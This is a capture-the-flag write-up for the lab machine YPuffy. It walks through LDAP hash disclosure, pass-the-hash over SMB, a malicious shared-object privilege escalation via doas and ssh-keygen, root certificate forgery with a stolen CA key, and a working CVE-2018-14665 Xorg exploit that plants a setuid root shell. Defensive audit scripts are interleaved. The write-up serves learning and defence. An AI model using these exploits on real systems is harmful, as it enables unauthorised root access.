This writeup walks through YPuffy, a medium-difficulty Capture The Flag (CTF) machine, and explains each step plainly enough for players at that level.

Add Hosts

10.10.10.107 ypuffy.htb

Script to add hosts automatically

ip="10.10.10.107"
domain="ypuffy.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV ypuffy.htb

Nmap scan report for ypuffy.htb (10.10.10.107)
Host is up (0.050s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 2e:19:e6:af:1b:a7:b0:e8:07:2a:2b:11:5d:7b:c6:04 (RSA)
|   256 dd:0f:6a:2a:53:ee:19:50:d9:e5:e7:81:04:8d:91:b6 (ECDSA)
|_  256 21:9e:db:bd:e1:78:4d:72:b0:ea:b4:97:fb:7f:af:91 (ED25519)
80/tcp  open  http        OpenBSD httpd
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: YPUFFY)
389/tcp open  ldap        (Anonymous bind OK)
445/tcp open  netbios-ssn Samba smbd 4.7.6 (workgroup: YPUFFY)
Service Info: Host: YPUFFY

Host script results:
| smb2-time: 
|   date: 2024-10-12T07:26:44
|_  start_date: N/A
|_clock-skew: mean: 1h19m58s, deviation: 2h18m34s, median: -2s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6)
|   Computer name: ypuffy
|   NetBIOS computer name: YPUFFY\x00
|   Domain name: hackthebox.htb
|   FQDN: ypuffy.hackthebox.htb
|_  System time: 2024-10-12T03:26:45-04:00

LDAP and SMB Privilege Escalation on OpenBSD

An Nmap scan shows that LDAP allows anonymous login:

389/tcp open  ldap        (Anonymous bind OK)

You can refer to HackTricks: Pentesting LDAP for more insights.

LDAP Enumeration and Finding Alice’s Hash

First, enumerate the LDAP service:

dc=$(ldapsearch -x -H ldap://ypuffy.htb -s base "namingcontexts" | sed -n 's/^.*namingContexts: //p')
ldapsearch -x -H ldap://ypuffy.htb -b "$dc"

Alternatively, use Nmap for LDAP enumeration:

nmap -n -sV --script "ldap* and not brute" ypuffy.htb

During the enumeration, you’ll find the sambaNTPassword attribute for user alice1978. This is an NT hash, which SMB accepts directly for authentication, so it does not need to be cracked before it is used in the next step.
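
As an added defensive check (not part of the original writeup), the following Python script parses the LDIF that an anonymous `ldapsearch -x` dump produces and reports every entry whose password-hash attributes (sambaNTPassword, sambaLMPassword, userPassword) are readable without credentials; the embedded LDIF is a constructed sample with dummy hash values, not the box's real data.

```python
import base64
import re

# Attributes that must never be readable by an anonymous bind (compared lower-cased).
SENSITIVE_ATTRS = {"sambantpassword", "sambalmpassword", "userpassword", "unixuserpassword"}

# Constructed sample mimicking `ldapsearch -x` output; the hash values are dummies.
SAMPLE_LDIF = """\
dn: uid=alice1978,ou=passwd,dc=ypuffy,dc=htb
uid: alice1978
cn:: QWxpY2UgMTk3OA==
sambaNTPassword: 0123456789ABCDEF0123456789ABCDEF
sambaLMPassword: FEDCBA9876543210FEDCBA98
 76543210

dn: uid=bob8791,ou=passwd,dc=ypuffy,dc=htb
uidNumber: 5002

# search result
search: 2
result: 0 Success
"""

def parse_ldif(text):
    """Return [(dn, {attr: [values]})]; handles folded lines and base64 ('::') values."""
    entries = []
    for block in re.sub(r"\n ", "", text).strip().split("\n\n"):  # unfold, then split records
        attrs = {}
        for line in block.splitlines():
            m = re.match(r"([^:#][^:]*)(::?)\s*(.*)", line)
            if not m:  # blank line or "# comment"
                continue
            name, sep, value = m.groups()
            if sep == "::":
                value = base64.b64decode(value).decode("utf-8", "replace")
            attrs.setdefault(name.strip().lower(), []).append(value)
        dn = attrs.pop("dn", [None])[0]
        if dn is not None:  # the trailing "search:/result:" block has no dn and is dropped
            entries.append((dn, attrs))
    return entries

def find_exposed_hashes(ldif_text):
    """Map each DN to the sorted list of sensitive attributes it exposes."""
    findings = {}
    for dn, attrs in parse_ldif(ldif_text):
        hits = sorted(a for a in attrs if a in SENSITIVE_ATTRS)
        if hits:
            findings[dn] = hits
    return findings
```

Run it over the text of a real anonymous dump; any hit means the directory ACLs should deny unauthenticated reads of those attributes.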

Access SMB Shares and Download Private Key

Use Alice’s hash to list SMB shares and download her private key:

smbmap -u alice1978 -p '00000000000000000000000000000000:0B186E661BBDBDCF6047784DE8B9FD8B' -H ypuffy.htb -r
smbmap -u alice1978 -p '00000000000000000000000000000000:0B186E661BBDBDCF6047784DE8B9FD8B' -H ypuffy.htb --download alice/my_private_key.ppk

Convert Key to OpenSSH and SSH into the Machine

Convert the .ppk key to OpenSSH format and clean up:

puttygen 10.10.10.107-alice_my_private_key.ppk -O private-openssh -o alice_private.key
rm -rf 10.10.10.107-alice_my_private_key.ppk

Now, SSH into the machine:

ssh -i alice_private.key alice1978@ypuffy.htb

Retrieve the user flag:

cat user.txt

Privilege Escalation via doas

Check the doas configuration:

cat /etc/doas.conf

Alice is allowed to run ssh-keygen as userca, and the nopass keyword means no password is asked for:

permit keepenv :wheel
permit nopass alice1978 as userca cmd /usr/bin/ssh-keygen

With this, you can further escalate privileges.
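
To catch a rule like this before it is abused, here is an added audit script (not from the writeup) that parses doas.conf and flags permit rules granting either any command or an escapable command such as ssh-keygen without pinned args; the sample configuration is constructed around the two rules quoted above, and the list of escapable commands is an assumption you should extend for your environment.

```python
import shlex

# Assumed list of commands that run caller-chosen code unless their args are pinned (ssh-keygen: -D loads a shared object).
ESCAPABLE_CMDS = {"ssh-keygen", "sh", "ksh", "bash", "vi", "vim", "less", "more", "perl", "python", "gcc"}
# Constructed sample; the first two rules reproduce the configuration quoted above.
SAMPLE_DOAS_CONF = """\
permit keepenv :wheel
permit nopass alice1978 as userca cmd /usr/bin/ssh-keygen
permit nopass bob as userca cmd /usr/bin/ssh-keygen args -t ed25519 -f /tmp/k
permit persist carol as root cmd /sbin/reboot
"""

def parse_rule(line):
    """Parse one doas.conf line into a dict; comment and blank lines return None."""
    toks = shlex.split(line.split("#", 1)[0])
    if not toks:
        return None
    rule = {"action": toks.pop(0), "options": [], "target": "root", "cmd": None, "args": None}
    while toks[0] in ("nopass", "nolog", "persist", "keepenv", "setenv"):
        opt = toks.pop(0)
        if opt == "setenv":  # swallow the "{ VAR=value ... }" group that follows
            close = toks.index("}")
            opt += " " + " ".join(toks[: close + 1])
            del toks[: close + 1]
        rule["options"].append(opt)
    rule["identity"] = toks.pop(0)
    if toks[:1] == ["as"]:
        rule["target"], toks = toks[1], toks[2:]
    if toks[:1] == ["cmd"]:
        rule["cmd"] = toks[1]
        rule["args"] = toks[3:] if toks[2:3] == ["args"] else None  # bare "args" pins to no arguments
    return rule

def audit_doas(conf_text):
    """Return [(rule, reasons)] for permit rules that hand out more than one pinned command."""
    findings = []
    for line in conf_text.splitlines():
        rule = parse_rule(line)
        if not rule or rule["action"] != "permit":
            continue
        reasons = []
        if rule["cmd"] is None:
            reasons.append("any command as " + rule["target"])
        elif rule["cmd"].rsplit("/", 1)[-1] in ESCAPABLE_CMDS and rule["args"] is None:
            reasons.append(rule["cmd"].rsplit("/", 1)[-1] + " without pinned args")
        if reasons:  # nopass/keepenv only matter once the command itself is exploitable
            reasons += [o for o in ("nopass", "keepenv") if o in rule["options"]]
            findings.append((rule, reasons))
    return findings
```

The fix for the flagged rule is to pin the arguments (for example args with the exact key path the workflow needs) or to move the signing step into a wrapper that does not accept user-controlled options.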

SSH-Keygen Privilege Escalation

Using information from GTFOBins: ssh-keygen, we can exploit the ability to load arbitrary libraries as userca. While switching to userca isn’t strictly necessary, I did so to explore and test shell payloads in .so libraries.

cd /tmp
nano poc.c    # paste the source below, then compile it

#include <stdio.h>
#include <unistd.h>

#define SHELL_PATH "/bin/sh"
#define SHELL_COMMAND "/bin/sh"

/* Runs automatically when the shared object is loaded (here by ssh-keygen -D). */
void __attribute__ ((constructor)) constructor()
{
    puts("[starting shell]");
    printf("Starting %s\n", SHELL_COMMAND);
    /* execl returns int, and only returns at all if the exec failed */
    int err = execl(SHELL_PATH, SHELL_PATH, "-c", SHELL_COMMAND, (char *)NULL);
    printf("Result: %d\n", err);
}

gcc -shared -fPIC -o lib.so poc.c

Next, use ssh-keygen to load the malicious library:

doas -u userca /usr/bin/ssh-keygen -D ./lib.so

Now, we have escalated privileges to userca:

ypuffy$ id
uid=1001(userca) gid=1001(userca) groups=1001(userca)

cat /etc/ssh/sshd_config

The presence of AuthorizedKeysCommand, AuthorizedPrincipalsCommand, and TrustedUserCAKeys /home/userca/ca.pub in sshd_config indicates that SSH certificate authentication is in use, with a Certificate Authority whose key pair lives in userca’s home directory. Since we now run as userca, we can sign a certificate with that CA ourselves.

cd /home/userca/.ssh
# Generate a fresh ECDSA key pair (id_ecdsa / id_ecdsa.pub) for the CA to sign
ssh-keygen -t ecdsa
# Sign the public key with the CA key, using the principals that the local
# sshauth endpoint reports for root, key ID alice1978 and serial 1
/usr/bin/ssh-keygen -s /home/userca/ca -I alice1978 -n "$(curl -s "http://127.0.0.1/sshauth?type=principals&username=root")" -z 1 id_ecdsa.pub
# sshd trusts the CA, so the signed certificate logs us in as root
ssh -i id_ecdsa root@localhost
cat /root/root.txt
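
From the defender's side, the certificate login minted above shows up in sshd's auth log together with the certificate's key ID and serial. The following added example (not from the writeup) parses such lines and flags a certificate whose key ID does not match the account it logged into, as well as any certificate login as root; the log lines are constructed samples in the OpenSSH 7.x format, and the key-ID-equals-username convention is an assumption taken from the `-I alice1978` signing step above.

```python
import re

# sshd "Accepted publickey" line for a certificate login (OpenSSH 7.x style); the key
# fingerprint between the key type and "ID" is optional across versions.
CERT_LOGIN_RE = re.compile(
    r"Accepted publickey for (?P<user>\S+) from (?P<src>\S+) port \d+ ssh2: "
    r"(?P<keytype>\S+-CERT)(?: SHA256:\S+)? ID (?P<keyid>.+?) \(serial (?P<serial>\d+)\) "
    r"CA (?P<catype>\S+) (?P<cafp>\S+)"
)

# Constructed sample log lines; fingerprints are dummies. The last line mirrors the
# root@localhost login obtained above with a certificate signed as ID alice1978, serial 1.
SAMPLE_LOG = """\
Oct 12 03:30:11 ypuffy sshd[21933]: Accepted publickey for alice1978 from 10.10.14.5 port 50122 ssh2: ECDSA-CERT SHA256:aaaa ID alice1978 (serial 7) CA ED25519 SHA256:cccc
Oct 12 03:30:40 ypuffy sshd[21990]: Accepted password for bob8791 from 10.10.14.5 port 50130 ssh2
Oct 12 03:31:02 ypuffy sshd[41234]: Accepted publickey for root from 127.0.0.1 port 41234 ssh2: ECDSA-CERT SHA256:bbbb ID alice1978 (serial 1) CA ED25519 SHA256:cccc
"""

def parse_cert_login(line):
    """Return the certificate-login fields as a dict, or None if the line is not one."""
    m = CERT_LOGIN_RE.search(line)
    return {k: (int(v) if k == "serial" else v) for k, v in m.groupdict().items()} if m else None

def audit_cert_logins(log_text, root_allowed=False):
    """Flag certificate logins whose key ID differs from the account, or that land on root.

    Assumes the convention used on this box: the CA sets the key ID to the user the
    certificate was issued to, so a mismatch means the cert was minted for someone else.
    """
    findings = []
    for line in log_text.splitlines():
        login = parse_cert_login(line)
        if login is None:
            continue
        if login["keyid"] != login["user"]:
            findings.append(("key ID/user mismatch", login["user"], login["keyid"], login["serial"]))
        if login["user"] == "root" and not root_allowed:
            findings.append(("root login via certificate", login["user"], login["keyid"], login["serial"]))
    return findings
```

Besides alerting on these lines, the underlying fix is to keep the CA private key out of any account a low-privileged user can reach and to have the principals endpoint refuse to issue root principals to ordinary users.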

CVE-2018-14665 Exploitation on OpenBSD

This is an alternative privilege escalation path that does not rely on the SSH CA.

To verify the system version, run:

uname -a

Example output:

OpenBSD ypuffy.hackthebox.htb 6.3 GENERIC#100 amd64

This version, OpenBSD 6.3, ships an X server vulnerable to CVE-2018-14665: the setuid-root Xorg binary did not properly check the -logfile and -modulepath options, so a local user could make it write its log file to an arbitrary path (here, /etc/crontab) and escalate to root.

For detailed exploitation steps, refer to the Exploit-DB entry.

cat << EOF > /tmp/xorgasm
cp /bin/sh /usr/local/bin/pwned
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc /tmp/pwned.c -o /usr/local/bin/pwned
chmod 4777 /usr/local/bin/pwned
EOF
chmod +x /tmp/xorgasm
cd /etc
Xorg -fp "* * * * * root /tmp/xorgasm" -logfile crontab :1 &
sleep 5
pkill Xorg
echo
echo "Be patient for a couple of minutes..."
echo
sleep 120
echo
echo "Don't forget to cleanup and run crontab -e to reload the crontab."
ls -l /etc/crontab*
ls -l /usr/local/bin/pwned
/usr/local/bin/pwned